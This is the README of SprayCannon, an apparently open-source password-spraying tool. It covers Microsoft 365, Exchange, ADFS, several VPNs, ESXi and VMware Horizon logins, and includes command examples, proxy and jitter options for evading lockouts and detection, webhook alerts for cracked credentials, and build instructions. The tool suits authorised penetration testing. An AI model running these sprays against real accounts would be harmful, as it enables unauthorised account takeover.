Arch Linux Debain(based) Linux Kali Mac OS

Why

I got sick and tired of having to remember and manually spray a password every 30-60 min for a userlist and managing a large list with what passwords had been sprayed for what user was the worst. Also adding to a userlist added additional problems with either starting over or leaving out missed passwords for new accounts. Additionally many spraying tools only existed for certain endpoints ie just an o365 spray tool or just an exchange spray tool. I wanted a standard framework that could do any spraying i needed with all the features i wanted. So i created....


Theres a wiki now.

SprayCannon

A fast multithreaded password spray tool designed to simplify and automate many password spraying problems i faced.

Features

Current supported spray types

fully implemented means that the module works as designed. some protocols may not support mfa detection. others i have not had a chance to compare the "valid" check for one with MFA enabled ( ex. sonicall virtualoffice ) |Type|MFA support| Lockout Detection | Fully implemented | |----|-----------|-------------------|-------------------| ExchangeEAS|no | no | yes
ExchangeOWA|no | no | yes (could be a little more refined but fully working) adfs_forms |no | no | yes SonicwallVirtualOffice|no | no | yes (no mfa though) (validation not confirmed) Sonicwall(the digest one) | no | no | yes(validation not confirmed) O365|YES|YES|yes SSLVPN Cisco|no|no|yes ~~( i converted some code from a previous spraying ruby script i wrote that worked. but havent had a chance to test this one)~~ confirmed with group= --domain flag. VPN Fortinet|no|no|kinda(use at own risk)(validataion not confirmed) Spiceworks|no|no|no(no mfa/lockout though)(validataion not confirmed) InfinateCampus|no|no|yes Global Protect | no|no|not fully tested ESXI (root web) | no | no (default is 10 be carefull) | yes - tested with esxi 6.5,7.0 VmWare Horizon (Domain Joined Web prompt) | no | no | yes

Examples:
./spraycannon -s msol -u [email protected] -p password123
./spraycannon -s adfs_forms -u usernames.txt -p passwords.txt
./spraycannon -s msol --user-pass-format upffile.txt
./spraycannon -s ExchageOWA -u [email protected] --user-as-password --target "https://adfs.mydomain.com"

Global options:
    -s, --spray-type=[spraytype]     Set spray type. use --list-spraytypes to get current list
    -t, --target=[ip/hostname]       Target to spray ( could also be a fireprox address )
    -u, --username=[name]            Username or user txt file to spray from
    -p, --password=[password]        Target to spray
    -d, --delay=[time]               time in seconds to delay between password attempts
    -j, --jitter=[time]              time in milliseconds to delay between individual account attempts. default is 1000.
    --domain=[domain]                Sets the domain for options that require domain specification.
    -h, --help                       Print Help menu
    --version                        Print current version
    -v, --verbose                    Print verbose information
Additional Options:
    --threads=[count]                Use worker threads to drasticly speed things up!(default is 1)
    --nodb                           does not use the database
    --user-as-password               Sets the user and password to the same string
    --user-pass-format=[filename]    Supplied file in 'user:password' format
    --webhook=[url]                  Will send a webhook if valid credential is found!! (autodetects Teams, Discord, Slack, and Google Chat URLS) 
    --useragent=[agentstring]        Use a custom useragent string, or a file containing useragents(will chose randomly from them).
    --list-spraytypes                List the available spraytypes.

Use

Download from releases.

or

Compile yourself

either use the make file

make init       # downloads dependant libs to the local directory 
make            # compiles spraycannon and spdb 
make install    # installs the tools

Compile the manual way

crystal build -p src/spraycannon.cr 
crystal build -p src/spdb.cr 

You can also use:

crystal build -p --no-debug --release

Which will take longer but will be more optimized (not that you need it) it also may not give you help if something breaks.... your choice

Examples:

./spraycannon -s ExchangeEAS -u users.txt -p passwords.txt
./spraycannon -s msol -u "[email protected]" -p passwords.txt
./spraycannon -s vpncisco -u users.txt -p "Password123" --webhook "https://teamswebhook.com/asdfasdfasdf"
./spraycannon -s msol -u emails.txt -p "Password123" --jitter 500 --dealy 3600  --target "https://aws.fireprox.instance/fireprox"

TODO

Contributing

spdb

spdb is a simple applicaion to interact with the backend db for SprayCannon. there is now a timestamp for each password spray item. so it is possible to go back and see exactly what time a specific user attempt was sprayed.

interactive commands:

spdb2

spdb2 is the new updated version of spdb. it now features a tab completsion and help menu scrolling option while naviating. features are expiramental at this point. but should work as advertized.

On the shoulders of Giants

Some of the available spraytypes/options would not have been possible if not for the previous work done by:

Thank you all for your inspiration and contributions to the community!!!

Crystal Install help

Spraycannon is written in crystal-lang. A language similar to ruby in syntax but produces a compiled binary, is extremely fast, and is easy to work with. Installing can be done as below. if you dont trust these commands... go here: https://crystal-lang.org/install/


Arch based linux distros

sudo pacman -S crystal shards 

Debian/RedHat based linux distros(Kali too)

curl -fsSL https://crystal-lang.org/install.sh | sudo bash

Windows (Crystal not fully supported on windows yet) there are several options:

* Note: Crystal doesnt have an official windows compiler release yet. If a bug is found please create a bug report and i will try to address it.

MacOS(homebrew):

brew update
brew install crystal

* Note: I dont have a mac so i cant quite support MacOS. If a bug is found please create a bug report and i will try to fix.